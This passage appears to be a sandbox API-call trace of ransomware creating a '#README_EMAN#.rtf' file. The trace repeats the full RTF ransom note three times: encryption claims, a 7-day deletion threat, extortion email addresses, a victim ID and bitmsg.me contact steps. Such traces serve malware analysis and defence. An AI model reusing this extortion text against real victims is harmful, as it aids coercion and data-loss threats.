dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount1=53, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 3 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\", cchCount1=74, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\", cchCount1=45, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0219.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 2 [0219.656] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\#readme_eman#.rtf")) returned 0xffffffff [0219.656] GetLastError () returned 0x2 [0219.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0219.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0219.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0219.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462dd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 